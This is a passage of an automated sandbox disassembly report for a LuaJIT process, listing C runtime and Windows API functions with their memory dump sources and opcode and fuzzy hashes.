Instruction Fuzzy Hash: DB419D33E2868697EB288B28D64127937A0FB55B94F141231DE4EC7791CF7CE462C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8E460 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E8E557

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b10af8f814f489376099eec4d1b2bf2dee6a1fc06b5f619ad505525f2efba06e
Instruction ID: df5532d5a33a05f12b31195e9f1bc50ceaf20c4838b90e9c273cfe1258c9e787
Opcode Fuzzy Hash: b10af8f814f489376099eec4d1b2bf2dee6a1fc06b5f619ad505525f2efba06e
Instruction Fuzzy Hash: 2731CC63A3870286E701AB55C84137C3A61AF91BA5F950236EE1D837D3DFBCF4808721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E91A38 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E91A5B

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d92fb9f933d27554a6cb99c76bd027f6f14b4a50af115597ec1a8aa59d8bf4e5
Instruction ID: 4ea6fb2f41866c731708e410a02228a16cbd10ff627bc7b746a76fb4e3478e71
Opcode Fuzzy Hash: d92fb9f933d27554a6cb99c76bd027f6f14b4a50af115597ec1a8aa59d8bf4e5
Instruction Fuzzy Hash: 1E21CF33A28A428AEB618F18D44037D76A1FB94B94F240634EE5DC76D9DF7CD8008B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E7B5F4 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E7B560

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: fb79b73e31443315b15ba215925383b008ee0bd27683f4ef0e524f3c4fb95238
Instruction ID: 6abc5a488dcd50427a431f770d4475793d2821477c5932942e362a7cef3194ed
Opcode Fuzzy Hash: fb79b73e31443315b15ba215925383b008ee0bd27683f4ef0e524f3c4fb95238
Instruction Fuzzy Hash: 5C114F63A3C64681FB619B11A80037E66A1AF66B84F944031EE8CC7A97DE7CE8408780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E7B880 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E7B8D4

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: af37a60413a17d8473b8d44331bda34389474ee41ecb07c9201159644b11a6c4
Instruction ID: 95a722d148b9026c8fa2b211ba845aae00a695ae000ce649d23793a4abec3d50
Opcode Fuzzy Hash: af37a60413a17d8473b8d44331bda34389474ee41ecb07c9201159644b11a6c4
Instruction Fuzzy Hash: 9801C462A3874581EA04DB53A90007AA695BF96FE0F088636EF9C97BD7DE3CE1418340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8D8D4 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fa6a365d5d5c4294d64f83ce85103c55880a4483ee34e8b82cb97a1197a25a5
Instruction ID: 5b9895a8f4655b805b5b9ec071244a61993194c53668ef06c7402d32b61f9ce5
Opcode Fuzzy Hash: 8fa6a365d5d5c4294d64f83ce85103c55880a4483ee34e8b82cb97a1197a25a5
Instruction Fuzzy Hash: AA119A73928B4692EB05DF54D4402BD7B60EB95760F904236EA8D866EACFBCE050CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E7B3F8 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E7B415

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b9723b2fa6b8395273e2ffa61bfe6fca328ee90c81d1884146be664d7a584207
Instruction ID: d6bc1f54038c955fedebe888069c61c7cc7dd063c565adc28b9a730b538208fa
Opcode Fuzzy Hash: b9723b2fa6b8395273e2ffa61bfe6fca328ee90c81d1884146be664d7a584207
Instruction Fuzzy Hash: 05014423E3850641FE14AB75985637911605F567A8F241330ED6AC72D7EE7CF8419381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E895B8 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF677E8AF15,?,?,?,00007FF677E7B3E1,?,?,?,?,00007FF677E90643), ref: 00007FF677E8960D

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8c92631ddd479108e65c3c82da5241e8d94697d5707ddd739e7f006b69fafb14
Instruction ID: 1453a859866db58f5864a88d02a1f9cce1018637fb91e232fc19adc714114510
Opcode Fuzzy Hash: 8c92631ddd479108e65c3c82da5241e8d94697d5707ddd739e7f006b69fafb14
Instruction Fuzzy Hash: B0F0E947F3D30781FE545BA258513B812915F9AB90F4C6530CD0EC73C2DD2CF4808220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E2D190 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FF677E2D1D1

Part of subcall function 00007FF677E2D210: VirtualAlloc.KERNELBASE(?,?,?,?,?,?,?,00007FF677E40004), ref: 00007FF677E2D27A
Part of subcall function 00007FF677E2D210: VirtualFree.KERNEL32(?,?,?,?,?,?,?,00007FF677E40004), ref: 00007FF677E2D2B4

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: Virtual$AllocFreeProtect
String ID:
API String ID: 267585107-0
Opcode ID: dcc13f55656fb396d02a56895d196d25d38c93555ce6819a28256a1c2de6f193
Instruction ID: fe5372d588ce741a37e2295517c6bfd9c464f3d90a7951e6a70f308a74cd785a
Opcode Fuzzy Hash: dcc13f55656fb396d02a56895d196d25d38c93555ce6819a28256a1c2de6f193
Instruction Fuzzy Hash: F8F0E763729A8785EB54DF66E9446B93360EB58B8CF181032DF1E8B755CF3CD1608710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E00440 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF677E7B4E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E7B4F4

_fread_nolock.LIBCMT ref: 00007FF677E00483

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _fread_nolock_invalid_parameter_noinfo
String ID:
API String ID: 2335118202-0
Opcode ID: 15c3c532cb73625206ed1f9b06d8fcd0b23835c2a08478eab71b4d7046a8b065
Instruction ID: fb4a214aef49046007506837e72fb68d9ae611c5a8f76b95852640057ff869c6
Opcode Fuzzy Hash: 15c3c532cb73625206ed1f9b06d8fcd0b23835c2a08478eab71b4d7046a8b065
Instruction Fuzzy Hash: 6CF05432728B8581EB949F17F5812696364EB48BC4F485035EFAEC3B4ADF3CD4A18704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E7B47C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E7B49E

Part of subcall function 00007FF677E7B3F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E7B415

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 762f786ab5525af94e295b21e3b2186b322adc5012f5be3598c3d5dbbca7c19f
Instruction ID: 131e9f4344e5db4d909de0cd57677d5f980933d2eb13a69c77b12d0c8b4e4cb2
Opcode Fuzzy Hash: 762f786ab5525af94e295b21e3b2186b322adc5012f5be3598c3d5dbbca7c19f
Instruction Fuzzy Hash: BFF0E223A3C64381E914FB68A80217D22509F52790F241130FEADD67C3FE7CE4418341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677DF5074 Relevance: 1.5, APIs: 1, Instructions: 30synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE ref: 00007FF677DF50C2

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
Instruction ID: d72b25617d99f081847e6b2d117bdca61ef13ec1e9a2fdf9c4d0e6ac49801582
Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
Instruction Fuzzy Hash: DB011927218A8585D7059F3AC4504ACB7A4FB09F8DB088325DF996736CEF25D545C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8A62C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF677E8BFDE,?,?,?,00007FF677E7A8D4,?,?,?,00007FF677E7A89A,?,?,?,00007FF677E7AA21), ref: 00007FF677E8A66A

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c16f1a2d3b42783f13f4d960bc926358202b28562f19cfa66caf4b8f23791fb1
Instruction ID: a7e42c0e90e39e9d9bbcc758faaf00ba1742353519c3f1dfaf449ea101dc6fb2
Opcode Fuzzy Hash: c16f1a2d3b42783f13f4d960bc926358202b28562f19cfa66caf4b8f23791fb1
Instruction Fuzzy Hash: 04F0A913F3E24781FE2427B2684137822804F997B0F092730DC2EC63CADE2CE480AA10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677DFECC0 Relevance: 1.4, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF677DFECE5

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 258d358869d0156973fddf192d3b3550729c795473adcd661ce9d76028fbd30e
Instruction ID: d838f7f1b40a25de3b6b0f07bd39ffec05f836d1dab5962412139ea513619ad6
Opcode Fuzzy Hash: 258d358869d0156973fddf192d3b3550729c795473adcd661ce9d76028fbd30e
Instruction Fuzzy Hash: D44190737186458AD725DF2698043AD77A1FB48B94F184732DEAD8B795CE3CE486CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E2CF50 Relevance: 1.3, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?,?,00007FF677E0A78C,?,?,?,00007FF677DFA47A), ref: 00007FF677E2CF8B

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 25f0752e9c5e1c41a3bbac51f148e05c729895121489531105f02cbf924fc3bd
Instruction ID: 70db644b8d34d0760a877aa2462bea1142f8c9b1a80e5cb0662108cb3be0cdc6
Opcode Fuzzy Hash: 25f0752e9c5e1c41a3bbac51f148e05c729895121489531105f02cbf924fc3bd
Instruction Fuzzy Hash: 0AE0C92661AE8181EB58CB1AD4503A976A1BB8CB48F5DC531CE8D47714DE3CC0558700

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF677E9A3DC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF677E8AD3C: GetLastError.KERNEL32(?,?,?,00007FF677E8D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF677E8D143), ref: 00007FF677E8AD4B
Part of subcall function 00007FF677E8AD3C: SetLastError.KERNEL32(?,?,?,00007FF677E8D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF677E8D143), ref: 00007FF677E8ADE9

TranslateName.LIBCMT ref: 00007FF677E9A449
TranslateName.LIBCMT ref: 00007FF677E9A484
GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF677E87518), ref: 00007FF677E9A4C9
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF677E87518), ref: 00007FF677E9A4F1

Strings

utf8, xrefs: 00007FF677E9A5D5

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodePageValid
String ID: utf8
API String ID: 2136749100-905460609
Opcode ID: 37c6103468d14ebedd279d605b6ed83e4f92250a7d4cdd901299f417aef6e53b
Instruction ID: a06cd83013e350de4f3c27d8bb2ecebc2b48ce699e43d75299b175169e9ad99f
Opcode Fuzzy Hash: 37c6103468d14ebedd279d605b6ed83e4f92250a7d4cdd901299f417aef6e53b
Instruction Fuzzy Hash: 86918D33A2875286EB609F22D4412B933A5EFA4B84F444531DE8DC7796EF3CE591CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E9AE10 Relevance: 10.7, APIs: 7, Instructions: 171COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF677E8AD3C: GetLastError.KERNEL32(?,?,?,00007FF677E8D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF677E8D143), ref: 00007FF677E8AD4B
Part of subcall function 00007FF677E8AD3C: SetLastError.KERNEL32(?,?,?,00007FF677E8D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF677E8D143), ref: 00007FF677E8ADE9

EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,00007FF677E87511), ref: 00007FF677E9AF67
GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 00007FF677E9AF80
ProcessCodePage.LIBCMT ref: 00007FF677E9AFAA
IsValidCodePage.KERNEL32 ref: 00007FF677E9AFBC
IsValidLocale.KERNEL32 ref: 00007FF677E9AFD2
GetLocaleInfoW.KERNEL32 ref: 00007FF677E9B02E
GetLocaleInfoW.KERNEL32 ref: 00007FF677E9B04A

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 3939093798-0
Opcode ID: bb27ecb80f326de69b2bc042a2605d4d492ea8d5939a720322dd366a513871ed
Instruction ID: e662ca72a37e45c9fbeaeab56689a9c088f03a1b917de62cbfc7caf47490d609
Opcode Fuzzy Hash: bb27ecb80f326de69b2bc042a2605d4d492ea8d5939a720322dd366a513871ed
Instruction Fuzzy Hash: 1C716863B2860289FB519B60D8506FC33B0BF58748F444536CE9D83695EF3CE495CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E92D80 Relevance: 9.3, APIs: 6, Instructions: 280timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF677E92DCA

Part of subcall function 00007FF677E92720: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E92734

_get_daylight.LIBCMT ref: 00007FF677E92DB9

Part of subcall function 00007FF677E92780: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E92794

_get_daylight.LIBCMT ref: 00007FF677E93042
_get_daylight.LIBCMT ref: 00007FF677E93053
_get_daylight.LIBCMT ref: 00007FF677E93064
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF677E93270), ref: 00007FF677E9308B

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
String ID:
API String ID: 435049134-0
Opcode ID: acd602a20641a1e0021de9976082e0f02524a7123e8bb7d0934f9112a3952553
Instruction ID: 227663c15697682dee7a80e14f15bf39ff1daf0563d00a835c7055e025e787da
Opcode Fuzzy Hash: acd602a20641a1e0021de9976082e0f02524a7123e8bb7d0934f9112a3952553
Instruction Fuzzy Hash: C6B1C037A3824286EB20EF22E8815BA6B65BFA4784F454135EE4DC7B95DF3CE4518B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E84B08 Relevance: 9.2, APIs: 6, Instructions: 246COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E84B2A
_get_daylight.LIBCMT ref: 00007FF677E84B8A
_get_daylight.LIBCMT ref: 00007FF677E84B9B
_get_daylight.LIBCMT ref: 00007FF677E84BAC
_isindst.LIBCMT ref: 00007FF677E84BFD
_isindst.LIBCMT ref: 00007FF677E84C50

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
String ID:
API String ID: 1405656091-0
Opcode ID: a78ce45543d163b27d273261e845287827b59cb7cb8f5f1008334f4b2a1c458a
Instruction ID: 694dd239c959759b5f523780c9dfc34dc889a4b25462507e4b0e32b5938671a2
Opcode Fuzzy Hash: a78ce45543d163b27d273261e845287827b59cb7cb8f5f1008334f4b2a1c458a
Instruction Fuzzy Hash: D091C0B3B247468BEB588F65C9413B963A5EB55B88F44A039DE0DCB789EF3CE5418700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E88C9C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF677E88D15
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF677E88D2D
RtlVirtualUnwind.KERNEL32 ref: 00007FF677E88D68
IsDebuggerPresent.KERNEL32 ref: 00007FF677E88DA1
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF677E88DAB
UnhandledExceptionFilter.KERNEL32 ref: 00007FF677E88DB6

Memory Dump Source

